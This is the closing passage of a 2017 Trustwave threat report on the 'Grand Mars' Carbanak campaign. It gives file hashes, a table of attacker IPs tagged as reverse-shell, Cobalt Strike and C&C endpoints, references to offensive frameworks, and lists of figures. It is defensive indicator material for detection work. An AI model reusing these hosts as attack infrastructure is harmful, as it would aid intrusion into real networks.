update.exe 321BA0DFFEE63518BFE24FF02C0DF6A09692A5D32BCC33AA454AC7431D390F57 tool called Beacon,
signed file with
Comodo certificate

Batch file with PS1

1.bat BB0DF2ACCC9F34F432AD7A6279003EF4283508F20BDA005605B1245D0D5164A6
scripts

Encoded PS scripts
(32/64-bit), download
str.vbs EA82AD136A0964EA6E1EC30288BD0D6E41E8AEC2D0206D802BCE7429A8DD69BF
XOR-encrypted
payload to RAM

VBS installed Adobe-

vbssysteminstall.vbs B9D6CE9A1DBBD4888F58FC1B3732EF7FE17B00319103AD965237327908D0D254 UpdateManagement-
Tool as a service

VBS reading
hostnames from
resolv_ip.vbs 7AFE9EA1E8A6398E9C3BA4CAA0EEF788D80B6C07235558D23FDC818E3F9E9F6E
hostnames.txt and
pings them

Encoded PS scripts
(32/64-bit), download
\Windows\temp\vb__.vbs E9F7E0BE49BF2B3A276A664A57FEE4459B77964F1F3BEAE80BC461634BC2A6AF
XOR-encrypted
payload to RAM

Table 11. F
 ile IOCs for the Grand Mars APT

39
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Appendix B: Malicious hosts/IP addresses

Host Usage Geo Location

62.210.25.121 Reverse shell metepreter (port 80) France

80.84.49.61 Reverse shell metepreter (port 53) UK

80.84.49.66 VBS script C&C United Kingdom

81.17.28.124 AdobeUpdateManagementTool.vbs Switzerland

89.163.248.8 Reverse shell metepreter Germany

89.163.248.6 Reverse shell metepreter Germany

95.215.44.12 Cobalt Strike's Beacon Sweden

95.215.46.221 AdobeUpdateManagementTool.vbs Sweden

95.215.46.229 AdobeUpdateManagementTool.vbs Sweden

95.215.46.234 AdobeUpdateManagementTool.vbs Sweden

95.215.46.249 AdobeUpdateManagementTool.vbs Sweden

95.215.44.94 svchost.exe Sweden

95.215.47.105 Hosting AdobeUpdateManagementTool.vbs Sweden

104.250.138.197 svchost.exe United States

107.181.246.189 Carbanak C&C (port 443) United States

148.251.18.75 AdobeUpdateManagementTool.vbs Germany

179.43.140.85 Carbanak C&C (port 443) Switzerland

179.43.133.34 AdobeUpdateManagementTool.vbs Switzerland

192.99.14.211 Carbanak C&C Canada

212.129.36.175 PowerShell C&C France

Table 12. M
 alicious hosts and IPs

References
1. Metasploit 
https://www.metasploit.com/
2. PowerSploit 
https://github.com/PowerShellMafia/PowerSploit
3. Veil Framework https://www.veil-framework.com/
4. Office File Formats https://msdn.microsoft.com/en-us/library/office/cc313118(v=office.12).aspx
5. Script Encryptor http://www.dennisbabkin.com/screnc/
6. Procdot Tool http://www.procdot.com/
7. Reflective DLL Injection http://www.harmonysecurity.com/files/HS-P005_ReflectiveDllInjection.pdf

40
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

List of Figures
Figure 1. Email received by victim with a Word attachment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Figure 2. Message body of the suspect email . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Figure 3. Microsoft Word .docx attachment (1-list.docx) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Figure 4. Word .docx Macro enabled malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Figure 5. Embedded oleObject0.bin file from Word document . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Figure 6. oleObject.bin showing potentially encoded content . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Figure 7. Use of legitimate tool to encrypt/encode VBE script . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Figure 8. Tool used for obfuscating the VBE script . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
Figure 9. Binary to String conversion functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
Figure 10. Base64 encode-decode functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
Figure 11. Starter.vbs creation (truncated) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Figure 12. LanCradDriver.vbs LanCradDriver.ini creation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Figure 13. TransbaseOdbcDrive.js creation (truncated) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
Figure 14. Persistence of starter.vbs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
Figure 15. Calculating and encoding of Disk S/N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
Figure 16. Checking proxy configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
Figure 17. Main function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
Figure 18. sendFormData function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
Figure 19. Initial submission Google Form . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
Figure 20. Files dropped on execution of embedded VBE script . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Figure 21. Starter.vbs script . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Figure 22. Process information for TransbaseOdbcDriver.js . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
Figure 23. LoadLinkSettings() function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
Figure 24. Google macro execution output . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Figure 25. LogInet() function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Figure 26. Infected system registration using Google Form . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Figure 27. Calling GetSourceCode() function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
Figure 28. GetSourceCode function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
Figure 29. Code from Pastebin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
Figure 30. Arguments from Pastebin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
Figure 31. Pastebin account used for tracking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
Figure 32. Downloading code from Google Docs (truncated) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
Figure 33. Encoded PowerShell commands retrieved from Google Spreadsheet . . . . . . . . . . . . . . . . . . . . . . . . . 18
Figure 34. LaCradDriver.ini (truncated) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
Figure 35. LanbCradDriver.vbs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
Figure 36. LanCradDriver.ini (truncated) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
Figure 37. LanCradDriver.ini populated post-execution of TransbaseOdbcDriver.js . . . . . . . . . . . . . . . . . . . . . . . . 20
Figure 38. Role of dropped files and sequence of execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
Figure 39. Activity diagram showing C&C involving Google Forms and Docs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
Figure 40. Activity diagram showing C&C in case Google Spreadsheet not available . . . . . . . . . . . . . . . . . . . . . . 22
Figure 41. TCP Reverse Shell from a PowerShell script . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
41
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Figure 42. Registry persistence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24

Figure 43. SysCheks Scheduled Task persistence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Figure 44. Event showing Pass-the-Hash indicators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Figure 45. Batch file used for spreading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
Figure 46. PowerShell script used for spreading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
Figure 47. HTTP POST request used to exfiltrate data from compromised system . . . . . . . . . . . . . . . . . . . . . . . . 28
Figure 48. HTTP POST method options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
Figure 49. XOR key detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
Figure 50. Payload decoding . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
Figure 51. Starting Anunak after decrypting it . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
Figure 52. Procdot visualization of UVZHDVIZ.exe. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
Figure 53. Digital certificate details of UVZHDVIZ.exe (Grand Mars) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
Figure 54. Digital certificate details of update.exe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
Figure 55. Decryption routine with XOR key . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
Figure 56. Loader Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
Figure 57. PE Executable . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
Figure 58. Memory allocation for payload . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
Figure 59: Routine to decrypt beacon DLL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
Figure 60. Decrypted beacon DLL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
Figure 61. Reflective beacon DLL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
Figure 62. EICAR test string in X-Malware field . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
Figure 63. Malicious hosts geolocation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
Figure 64. Shtokov Pastebin site used in Command and Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37

List of Tables
Table 1. Hashes of Starter.vbs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Table 2. Hashes of TransbaseOdbcDriver.js . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
Table 3. Hashes of LanCradDriver.vbs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
Table 4. Hashes of LanCradDriver.ini . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
Table 5. Hashes of AdobeUpdateManagementTool.vbs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
Table 6. Examples of supported commands . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
Table 7. Hashes of UVZHDVlZ.exe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
Table 8. Hashes of Update.exe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
Table 9. Hashes of 322.exe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
Table 10. Valid {transport} command line options for 322.exe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
Table 11. File IOCs for the Grand Mars APT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
Table 12. Malicious hosts and IPs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40

42
Copyright © 2017 Trustwave Holdings, Inc.
trustwave.com Copyright © 2017 Trustwave Holdings, Inc.

GMAPTO_0116